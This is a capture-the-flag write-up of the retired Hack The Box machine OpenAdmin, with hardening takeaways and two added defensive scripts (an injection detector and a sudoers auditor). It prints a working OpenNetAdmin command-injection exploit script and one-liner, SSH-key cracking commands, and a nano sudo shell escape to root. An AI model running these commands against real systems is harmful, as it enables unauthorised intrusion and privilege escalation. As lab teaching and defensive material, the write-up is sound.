
Hack The Box :: OpenAdmin

 ·  ☕ 4 min read  ·  🧔🏻 noobintheshell


OpenAdmin is an Easy Linux box created by dmw0ng. It was released on January 4th, 2020 and retired on May 2nd, 2020. The users rated the difficulty 4.4/10 and gave an overall score of 4.5/5 to this box.

OpenAdmin Info Card

TL;DR

We discover a website with a broken login page link that gives access to an OpenNetAdmin instance. The installed version has a known RCE vulnerability that we exploit to get jimmy's password. We log in through SSH and discover an internal website that hands out joanna's SSH private key if we can log in. We find the SHA512 hash of the login password in the source code and crack it easily. The private key we obtain is encrypted; we crack its passphrase with john and log in as joanna to get the user flag. joanna is a sudoer and can run nano with root privileges. From inside nano we can execute commands to get a root shell and grab the root flag.


Reconnaissance & Enumeration

Open Ports

An NMAP scan shows the following (partial) output:

$ sudo nmap -sS -sV -p- 10.10.10.171

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

We discover the usual OpenSSH and Apache servers on their respective default ports.

Web discovery

The landing page is the default Apache2 page. A gobuster file/directory scan discovers 3 different websites:

$ gobuster dir -u http://10.10.10.171/ -w wordlists/big.txt
/artwork
/music
/sierra

Artwork and Sierra offer different services for start-ups. Their content is, for the most part, static, except for a contact form. Music offers music downloads for artists and is the only one with a login page:

Magic landing page

However, the login page link does not seem to be configured properly, as it leads to /ona, an instance of OpenNetAdmin v18.1.1 (see the page title), a tool used to manage IP inventories:

OpenNetAdmin

There is a public vulnerability impacting this tool and the version that is running:

searchsploit OpenNetAdmin

Gaining Access

The content of the exploit 47691.sh is short:

#!/bin/bash
URL="${1}"
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

This will output a pseudo-shell where we can send commands and get the results. On macOS, the built-in head command does not support the -n flag with negative values. We can use ghead instead (brew install coreutils), and the command becomes:

$ while true;do echo -n "$ "; read cmd;curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" http://10.10.10.171/ona/ | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | ghead -n -1;done

OpenNetAdmin exploit
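From the defender's side, the interesting part of this exploit is how recognisable it is: every request is an xajax window_submit call to the tooltips handler whose ip argument contains a shell separator. The following Python script is an added example (not part of the original write-up and not OpenNetAdmin code) that flags such request bodies. It assumes you have the POST bodies available, for instance from a mod_security audit log or a reverse proxy that records bodies, since a plain Apache access log does not contain them. The two sample bodies are constructed: the first mirrors the 47691.sh payload with cmd set to id, the second is what a benign single-address tooltip lookup is assumed to look like.

```python
"""Flag OpenNetAdmin tooltips/ping command-injection attempts in captured form bodies."""
import re
from urllib.parse import unquote_plus

# Characters that let a value in the ip field break out of the intended ping argument.
SHELL_META = re.compile(r"[;|&`\n]|\$\(")


def parse_form_body(body):
    """Split an application/x-www-form-urlencoded body into (key, value) pairs.

    Done by hand rather than with urllib.parse.parse_qs so that a literal ';'
    in a value (the injection separator) is never treated as a pair separator,
    which older parse_qs versions do by default.
    """
    pairs = []
    for part in body.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs


def detect_ona_injection(body):
    """Return the reasons this body looks like the ONA ping injection ([] if clean)."""
    pairs = parse_form_body(body)
    fields = dict(pairs)
    args = [value for key, value in pairs if key == "xajaxargs[]"]
    reasons = []
    # Legitimate tooltip pings exist, so only the ping context combined with a
    # shell metacharacter in the ip field counts as an indicator.
    if fields.get("xajax") == "window_submit" and "tooltips" in args and "ping" in args:
        for value in args:
            if value.startswith("ip=>") and SHELL_META.search(value[4:]):
                reasons.append(f"shell metacharacter in tooltips ip field: {value!r}")
    return reasons


# Constructed sample bodies (not captured from the box).
INJECTED_BODY = ('xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips'
                 '&xajaxargs[]=ip%3D%3E;echo "BEGIN";id;echo "END"&xajaxargs[]=ping')
BENIGN_BODY = ('xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips'
               '&xajaxargs[]=ip%3D%3E10.10.10.1&xajaxargs[]=ping')

if __name__ == "__main__":
    for label, body in (("injected", INJECTED_BODY), ("benign", BENIGN_BODY)):
        print(label, detect_ona_injection(body) or "clean")
```

The same condition translates directly into a WAF rule; the point of keeping the ping context in the check is to avoid alerting on every semicolon that reaches the application.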

By exploring the website files, we find some credentials in the database configuration file:

database_settings.inc.php

There are two users on the system: joanna and jimmy. The password is jimmy's, and it gives us SSH access.


Local Reconnaissance & Enumeration

There is an internal website listening on port 52846:

internal website

The content is pretty simple: there is a login page, and its source shows that only jimmy is allowed to log in:

/var/www/internal/index.php

The SHA512 hash does not correspond to jimmy's password. Once logged in, we can access joanna's SSH private key:

/var/www/internal/main.php

Privilege Escalation

User pivoting

We can crack the SHA512 hash online:

CrackStation result

And retrieve the private key:

$ curl -XPOST localhost:52846 -d "login&username=jimmy&password=Revealed" -L -v

The redirection to /main.php does not seem to work, but we get a session cookie that we can reuse:

$ curl localhost:52846/main.php -H "Cookie: PHPSESSID=po0mav9u27apgapafu0r518aj2" -v

main.php page

We grab joanna's encrypted private key. There is one last message at the bottom of the page:

Don’t forget your “ninja” password

We save the key and prepare it for cracking with ssh2john.py:

$ ssh2john.py joanna_key > hash.txt

Then we crack it with john:

$ john hash.txt --wordlist=wordlists/rockyou.txt

The password is: bloodninjas. We log in through SSH and get the user flag:

$ ssh -i joanna_key joanna@10.10.10.171
joanna@openadmin:~$ cat user.txt
c9b2************************1b5f

Root escalation

The escalation to root is fairly simple. joanna is a sudoer and can run nano as root:

sudo -l

GTFObins has the solution to spawn a shell as root:

sudo /bin/nano /opt/priv
Ctrl-R Ctrl-X
reset; sh 1>&0 2>&0
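The root step works because nano, like the other editors and pagers listed on GTFObins, can spawn a subprocess from inside the program, so a sudo rule that names it is effectively a rule that grants a root shell. The following Python script is an added example (not from the write-up and not a GTFObins tool) that audits a sudoers file for exactly this class of rule. It parses the standard sudoers user-specification syntax; the sample file is constructed to resemble the box's configuration, since the actual sudoers content is only shown in the screenshot.

```python
"""Audit sudoers user specifications for commands that hand out a shell."""
import os
import re

# Editors and pagers documented on GTFObins as able to run a subprocess from
# inside the program; any of them under sudo is equivalent to a root shell.
ESCAPE_CAPABLE = {"nano", "vim", "vi", "view", "less", "more", "man", "emacs"}

# who  host = (runas) [TAG:] command [, command ...]
SUDOERS_RULE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
TAG = re.compile(r"^[A-Z]+:\s*")  # NOPASSWD:, SETENV:, ...


def parse_sudoers(text):
    """Return (who, runas, command spec) triples for every user specification."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        match = SUDOERS_RULE.match(line)
        if not match:
            continue
        for spec in match.group("cmds").split(","):
            spec = spec.strip()
            while TAG.match(spec):
                spec = TAG.sub("", spec, count=1)
            rules.append((match.group("who"), match.group("runas") or "root", spec))
    return rules


def audit_sudoers(text):
    """Return (who, runas, spec, reason) for every rule that yields a shell."""
    findings = []
    for who, runas, spec in parse_sudoers(text):
        command = spec.split()[0]
        if command == "ALL":
            findings.append((who, runas, spec, "unrestricted command list"))
        elif os.path.basename(command) in ESCAPE_CAPABLE:
            findings.append((who, runas, spec,
                             f"{os.path.basename(command)} can spawn a shell (see GTFObins)"))
    return findings


# Constructed sample modelled on the box; not the real /etc/sudoers.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
joanna  ALL=(ALL) NOPASSWD: /bin/nano /opt/priv   # the OpenAdmin misconfiguration
backup  ALL=(root) NOPASSWD: /usr/bin/rsync --server --sender -n . /srv/backup
"""

if __name__ == "__main__":
    for who, runas, spec, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{who:8} ({runas}) {spec}: {reason}")
```

Restricting nano to a single file, as the rule for joanna does, changes nothing: the shell escape is a feature of the binary, not of the file it opens, which is why the audit looks only at the command's basename.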


Conclusion

This was an entry-level Linux box with no particular difficulty and a good one, in my opinion, to start pentesting. It requires basic enumeration, password/key cracking, usage of public exploits and knowledge of basic privilege escalation techniques.

As usual, here are some takeaways:

  • do not expose management tools without strong authentication and make sure your tooling is up to date,
  • enforce a strong password policy, password and key managers, MFA and don’t re-use passwords,
  • avoid playing with sudo configuration if you are not sure of what you do and how it can be abused. Have a look at GTFObins to start with…

Resources

[1] OpenNetAdmin
https://opennetadmin.com/

[2] CrackStation
https://crackstation.net/

[3] GTFObins - Nano
https://gtfobins.github.io/gtfobins/nano/#sudo

WRITTEN BY
noobintheshell
AppSec Engineer and CTFer